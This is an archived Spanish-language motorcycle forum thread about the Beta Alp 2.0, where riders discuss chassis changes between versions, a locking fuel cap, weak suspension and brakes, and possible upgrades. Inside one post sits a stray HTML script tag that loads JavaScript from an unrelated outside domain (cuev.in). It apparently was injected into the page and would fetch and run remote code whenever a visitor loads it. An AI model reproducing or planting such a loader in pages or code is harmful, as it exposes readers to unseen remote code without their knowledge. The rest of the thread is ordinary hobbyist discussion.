PDA

Ver la versión completa : Preguntas sobre la beta Alp 2.0



idscasper
11/11/2015, 21:41
Hola. Un par de preguntas sobre esta moto. No se si iría mejor en el técnico. Sabéis si la versión nueva frente a la antigua cambia algo el chasis? O solo suspensiones, frenos y plásticos?
Otra mas... Sabeis donde se puede encontrar tapón de gasolina con llave para este modelo?
Gracias

RobertoDT
12/11/2015, 07:35
Lo único que cambia es la estética y el poder quitar asiento y tapas para hacerla mas "trialera".

ernestoruiz
12/11/2015, 18:15
Otra mas... Sabeis donde se puede encontrar tapón de gasolina con llave para este modelo?
Gracias
He mandado un email a Beta Trueba, aver si me contestan.

ioni
12/11/2015, 18:41
Yo les mande un email preguntando por unos recambios originales hace mas de un mes y ni puto caso me han hecho

idscasper
12/11/2015, 20:49
http://endurorecambios.com/Carroceria/38062-tapon-con-llave-para-depositos-gasolina.html

Este pone que es para Husqvarna pero tal vez valdría?

JOE VESPINO
12/11/2015, 22:13
Mira a ver en www.ebay.it (ebay italia), en su epoca donde mas cosas veia para la moto

ortograski2
16/11/2015, 20:55
Buena y divertida moto, me pesa todavía haberla quitado. No descarto volver a tener una si la encuentro a buen precio

SALUDOS

idscasper
16/11/2015, 23:13
http://m.motofan.com/prueba/beta-alp-200-dos-en-una/359
Igual ya conociais pero me ha gustado este análisis que hacen del modelo "nuevo".

JOE VESPINO
17/11/2015, 09:23
La verdad es que yo no creo que aporte gran cosa.

Tienes que tener en cuenta que las suspensiones se le atragantan los pisteos a velocidades medias en adelante, a la horquilla se le acumula el trabajo, empieza a hacer topes y flanea. Los frenos, al menos los de la mía, eran muy flojos en asfalto o pisteos rapidos, eso si, perfectos para zonas tecnicas, barro etc porque modulabas de miedo (de trial)..... pero como se te cruzara un coche yendo a casa.

La moto yo la veía perfecta para salidas en plan exploratoria en solitario, te metias por cualquier parte sin miedo, casi te la podias echar la moto debajo del brazo si la cosa se complicaba. Tambien era ideal para ciudad, bajita, asiento comodo, muy suave, incluso recorridos cortos de carretera, salvo por los frenos.. De potencia suficiente para las pretensiones de la moto, aunque alguna cuesta era imposible subirla ni en primera, salvo que la acometieses muy lanzado, cosa peligrosa con esas suspensiones.

Con todo esto no quiero decir que no sea la moto que necesitas, ni lo contrario, solo que mejor la pruebes.. Y va a depender mucho de la moto que lleve la gente con la que salgas, creo que en esta moto especialmente es obligatorio con gente que salga con motos similares, si vas acompañado de enduros o trails ligeras va a sufrir mucho para seguirles.

Suerte.

idscasper
17/11/2015, 16:08
Si me hago con alguna , trataría de hacerle algo a las suspensiones y si lo veo necesario también al freno de adelante. No creo que haya pegas en itv por eso no?
Normalmente salgo solo haciendo paseíllos por aquí cerca y explorando como decís. El otro uso va a ser el urbano. No tengo intención de hacer carretera. También me gustaría meter la moto a la furgo sin que me ocupe mucho espacio cuando bajo al pueblo o voy a algún sitio interesante.
Lo que se que echare de menos es el empuje de la Dr 650,cuando abres el acelerador. Pero todo no se puede tener.

JOE VESPINO
17/11/2015, 17:26
Para salir solo a complicarse la vida, y en ciudad es ideal.

Los frenos igual se puede sustituir la bomba por alguna otra mas potente de la misma marca que encuentres por ahí de segunda mano, luego buscar pastillas mas agresivas y poner latiguillos metalicos. La horquilla de 30 y pocos mms poca solución tiene, yo le metí unos tacos de plastico y aceite mas denso y por lo menos no hacía topes.

Saludos.

<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

idscasper
17/11/2015, 18:17
Habrá que ponerle una invertida de motocros a ver que pasa!:lol:

gasclassic
17/11/2015, 19:38
Habrá que ponerle una invertida de motocros a ver que pasa!:lol:

Mejoras recorrido y calidad de suspensión y frenada.
Lo único que habría que subirla de atras.
Con lo que dejaría de tener una de sus principales virtudes, el llegar bien al suelo.
Cada día tengo mas claro que de serie es difícil dar con algo que me guste totalmente.
Menos mal que las podemos modificar al gusto.

barbo7
17/11/2015, 20:23
Después de 20 años sin tener moto(alguna vuelta me dí con las de mis amigos)me compré una de estas alp,con la minima pretensión de sacarme rutas para la mtb por los alrededores de Zaragoza.
Sin duda para empezar está muy bien,18cv,100kg,buen motor(Suzuki)buen foco.Me dieron un piñon con un diente menos,cojia 80 kmh y con el desarrollo largo 100,con el corto y mis 95kg,subia por todos los sitios que me atrevia,con el largo llevaba buenos ritmos por los caminos saliendo con motos mas potentes,un poco corta de suspensiones y frenos, para mi suficientes,una drz s,frena igual,pesa 40kg menos en orden de marcha.
Pero considero que es una moto blanda para darle un trato "durillo"por el campo,donde se jode todo.Empezando porque no tiene chasis de doble cuna,sino que va interrunpido por el motor(corregidme si me equivoco)y muy muy blanda de plásticos,en una salida de 250km de monte en invierno partí el subchasis trasero(que porque venia un compañero detrás porque no me enteré)y me tuve que para en una zona de barro para no reventar el guarda barros delantero.
Al repretar tornillos un dia rompí la tija superior,y ya me dí cuenta de lo que iba esta moto,para empezar en el mundo de la moto,tanto chicas o chicos,o dar una vuelta por el pueblo cuando las vacaciones y alguna licencia mas ciudad o algo asi.
No me parece un buen negocio meter dinero en esta moto(ninguna es negocio)esta menos.Dependiendo el uso que vayas a darle y tu presupuesto hay otras opciones,no muchas porque el sector del trail ligero está muy corto pero las hay.